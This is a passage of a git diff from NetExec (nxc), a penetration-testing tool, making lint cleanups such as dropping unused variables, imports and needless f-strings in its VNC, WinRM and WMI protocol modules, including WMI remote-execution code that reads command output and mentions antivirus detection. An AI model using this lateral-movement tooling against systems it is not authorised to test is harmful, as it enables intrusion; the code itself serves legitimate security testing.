{self.mark_pwned()}{highlight(display_shell_access)}") return True diff --git a/nxc/protocols/vnc/database.py b/nxc/protocols/vnc/database.py index 450d6778..052f7640 100644 --- a/nxc/protocols/vnc/database.py +++ b/nxc/protocols/vnc/database.py @@ -56,7 +56,7 @@ class database: ) def reflect_tables(self): - with self.db_engine.connect() as conn: + with self.db_engine.connect(): try: self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine) self.CredentialsTable = Table("credentials", self.metadata, autoload_with=self.db_engine) diff --git a/nxc/protocols/winrm.py b/nxc/protocols/winrm.py index 9ba5e8e6..03bde3f0 100644 --- a/nxc/protocols/winrm.py +++ b/nxc/protocols/winrm.py @@ -52,7 +52,7 @@ class winrm(connection): try: smb_conn.login("", "") except BrokenPipeError: - self.logger.fail(f"Broken Pipe Error while attempting to login") + self.logger.fail("Broken Pipe Error while attempting to login") except Exception as e: if "STATUS_NOT_SUPPORTED" in str(e): # no ntlm supported @@ -217,14 +217,13 @@ class winrm(connection): self.logger.info(f"Connection Timed out to WinRM service: {e}") except requests.exceptions.ConnectionError as e: if "Max retries exceeded with url" in str(e): - self.logger.info(f"Connection Timeout to WinRM service (max retries exceeded)") + self.logger.info("Connection Timeout to WinRM service (max retries exceeded)") else: self.logger.info(f"Other ConnectionError to WinRM service: {e}") return False def plaintext_login(self, domain, username, password): try: - from urllib3.connectionpool import log # log.addFilter(SuppressFilter()) if not self.args.laps: @@ -253,7 +252,7 @@ class winrm(connection): # self.db.add_loggedin_relation(user_id, host_id) if self.admin_privs: - self.logger.debug(f"Inside admin privs") + self.logger.debug("Inside admin privs") self.db.add_admin_user("plaintext", domain, self.username, self.password, self.host) # , user_id=user_id) if not self.args.local_auth: diff --git a/nxc/protocols/winrm/database.py b/nxc/protocols/winrm/database.py index 38fe1f8b..ed0150b7 100644 --- a/nxc/protocols/winrm/database.py +++ b/nxc/protocols/winrm/database.py @@ -74,7 +74,7 @@ class database: ) def reflect_tables(self): - with self.db_engine.connect() as conn: + with self.db_engine.connect(): try: self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine) self.UsersTable = Table("users", self.metadata, autoload_with=self.db_engine) diff --git a/nxc/protocols/wmi.py b/nxc/protocols/wmi.py index 68330035..2a25a57a 100644 --- a/nxc/protocols/wmi.py +++ b/nxc/protocols/wmi.py @@ -15,7 +15,7 @@ from impacket.dcerpc.v5.dtypes import NULL from impacket.dcerpc.v5 import transport, epm from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_WINNT, RPC_C_AUTHN_GSS_NEGOTIATE, RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, MSRPC_BIND, MSRPCBind, CtxItem, MSRPCHeader, SEC_TRAILER, MSRPCBindAck from impacket.dcerpc.v5.dcomrt import DCOMConnection -from impacket.dcerpc.v5.dcom.wmi import CLSID_WbemLevel1Login, IID_IWbemLevel1Login, WBEM_FLAG_FORWARD_ONLY, IWbemLevel1Login +from impacket.dcerpc.v5.dcom.wmi import CLSID_WbemLevel1Login, IID_IWbemLevel1Login, IWbemLevel1Login MSRPC_UUID_PORTMAP = uuidtup_to_bin(('E1AF8308-5D1F-11C9-91A4-08002B14A0FA', '3.0')) @@ -261,7 +261,7 @@ class wmi(connection): request['vers_option'] = 0x1 request['entry_handle'] = entry_handle request['max_ents'] = 1 - resp = dce.request(request) + dce.request(request) except Exception as e: dce.disconnect() error_msg = str(e).lower() @@ -307,7 +307,7 @@ class wmi(connection): request['vers_option'] = 0x1 request['entry_handle'] = entry_handle request['max_ents'] = 1 - resp = dce.request(request) + dce.request(request) except Exception as e: dce.disconnect() error_msg = str(e).lower() @@ -362,7 +362,7 @@ class wmi(connection): request['vers_option'] = 0x1 request['entry_handle'] = entry_handle request['max_ents'] = 1 - resp = dce.request(request) + dce.request(request) except Exception as e: dce.disconnect() error_msg = str(e).lower() @@ -384,7 +384,6 @@ class wmi(connection): # It's very complex to use wmi from rpctansport "convert" to dcom, so let we use dcom directly. @requires_admin def wmi(self, WQL=None, namespace=None): - results_WQL = "\r" records = [] if not WQL: WQL = self.args.wmi.strip('\n') diff --git a/nxc/protocols/wmi/database.py b/nxc/protocols/wmi/database.py index 97145bab..73d1529d 100644 --- a/nxc/protocols/wmi/database.py +++ b/nxc/protocols/wmi/database.py @@ -48,7 +48,7 @@ class database: ) def reflect_tables(self): - with self.db_engine.connect() as conn: + with self.db_engine.connect(): try: self.CredentialsTable = Table("credentials", self.metadata, autoload_with=self.db_engine) self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine) diff --git a/nxc/protocols/wmi/proto_args.py b/nxc/protocols/wmi/proto_args.py index 53d37f68..04249adc 100644 --- a/nxc/protocols/wmi/proto_args.py +++ b/nxc/protocols/wmi/proto_args.py @@ -1,4 +1,3 @@ -from argparse import _StoreTrueAction def proto_args(parser, std_parser, module_parser): wmi_parser = parser.add_parser('wmi', help="own stuff using WMI", parents=[std_parser, module_parser], conflict_handler='resolve') @@ -8,7 +7,7 @@ def proto_args(parser, std_parser, module_parser): # For domain options dgroup = wmi_parser.add_mutually_exclusive_group() - domain_arg = dgroup.add_argument("-d", metavar="DOMAIN", dest='domain', default=None, type=str, help="Domain to authenticate to") + dgroup.add_argument("-d", metavar="DOMAIN", dest='domain', default=None, type=str, help="Domain to authenticate to") dgroup.add_argument("--local-auth", action='store_true', help='Authenticate locally to each target') egroup = wmi_parser.add_argument_group("Mapping/Enumeration", "Options for Mapping/Enumerating") diff --git a/nxc/protocols/wmi/wmiexec.py b/nxc/protocols/wmi/wmiexec.py index d7f55a7f..a4a7fceb 100644 --- a/nxc/protocols/wmi/wmiexec.py +++ b/nxc/protocols/wmi/wmiexec.py @@ -31,7 +31,7 @@ import base64 from nxc.helpers.misc import gen_random_string from impacket.dcerpc.v5.dtypes import NULL from impacket.dcerpc.v5.dcomrt import DCOMConnection -from impacket.dcerpc.v5.dcom.wmi import CLSID_WbemLevel1Login, IID_IWbemLevel1Login, WBEM_FLAG_FORWARD_ONLY, IWbemLevel1Login +from impacket.dcerpc.v5.dcom.wmi import CLSID_WbemLevel1Login, IID_IWbemLevel1Login, IWbemLevel1Login class WMIEXEC: def __init__(self, host, username, password, domain, lmhash, nthash, doKerberos, kdcHost, aesKey, logger, exec_timeout, codec): @@ -103,8 +103,8 @@ class WMIEXEC: descriptor = descriptor.SpawnInstance() retVal = descriptor.GetStringValue(2147483650, self.__registry_Path, keyName) self.__outputBuffer = base64.b64decode(retVal.sValue).decode(self.__codec, errors='replace').rstrip('\r\n') - except Exception as e: - self.logger.fail(f"WMIEXEC: Could not retrieve output file, it may have been detected by AV. Please try increasing the timeout with the '--exec-timeout' option. If it is still failing, try the 'smb' protocol or another exec method") + except Exception: + self.logger.fail("WMIEXEC: Could not retrieve output file, it may have been detected by AV. Please try increasing the timeout with the '--exec-timeout' option. If it is still failing, try the 'smb' protocol or another exec method") try: self.logger.debug(f"Removing temporary registry path: HKLM\\{self.__registry_Path}") diff --git a/nxc/protocols/wmi/wmiexec_event.py b/nxc/protocols/wmi/wmiexec_event.py index bac108e3..6b096af2 100644 --- a/nxc/protocols/wmi/wmiexec_event.py +++ b/nxc/protocols/wmi/wmiexec_event.py @@ -34,7 +34,7 @@ from nxc.helpers.powershell import get_ps_script from impacket.dcerpc.v5.dtypes import NULL from impacket.dcerpc.v5.dcomrt import DCOMConnection from impacket.dcerpc.v5.dcom.wmi import WBEMSTATUS -from impacket.dcerpc.v5.dcom.wmi import CLSID_WbemLevel1Login, IID_IWbemLevel1Login, WBEM_FLAG_FORWARD_ONLY, IWbemLevel1Login, WBEMSTATUS +from impacket.dcerpc.v5.dcom.wmi import CLSID_WbemLevel1Login, IID_IWbemLevel1Login, IWbemLevel1Login, WBEMSTATUS class WMIEXEC_EVENT: def __init__(self, host, username, password, domain, lmhash, nthash, doKerberos, kdcHost, aesKey, logger, exec_timeout, codec): @@ -189,8 +189,8 @@ class WMIEXEC_EVENT: command_ResultObject, _ = self.__iWbemServices.GetObject(f'ActiveScriptEventConsumer.Name="{self.__instanceID_StoreResult}"') record = dict(command_ResultObject.getProperties()) self.__outputBuffer = base64.b64decode(record['ScriptText']['value']).decode(self.__codec, errors='replace') - except Exception as e: - self.logger.fail(f"WMIEXEC-EVENT: Could not retrieve output file, it may have been detected by AV. Please try increasing the timeout with the '--exec-timeout' option. If it is still failing, try the 'smb' protocol or another exec method") + except Exception: + self.logger.fail("WMIEXEC-EVENT: Could not retrieve output file, it may have been detected by AV. Please try increasing the timeout with the '--exec-timeout' option. If it is still failing, try the 'smb' protocol or another exec method") def remove_Instance(self): if self.__retOutput: diff --git a/tests/e2e_test.py b/tests/e2e_test.py index c6cc9e81..70fec9ad 100644 --- a/tests/e2e_test.py +++ b/tests/e2e_test.py @@ -5,7 +5,7 @@ from rich.console import Console def get_cli_args(): - parser = argparse.ArgumentParser(description=f"Script for running end to end tests for nxc") + parser = argparse.ArgumentParser(description="Script for running end to end tests for nxc") parser.add_argument("-t", "--target", dest="target", required=True) parser.add_argument("-u", "--user", "--username", dest="username", required=True) parser.add_argument("-p", "--pass", "--password", dest="password", required=True) @@ -68,7 +68,7 @@ def run_e2e_tests(args): ) version = result.communicate()[0].decode().strip() - with console.status(f"[bold green] :brain: Running {len(tasks)} test commands for nxc v{version}...") as status: + with console.status(f"[bold green] :brain: Running {len(tasks)} test commands for nxc v{version}..."): passed = 0 failed = 0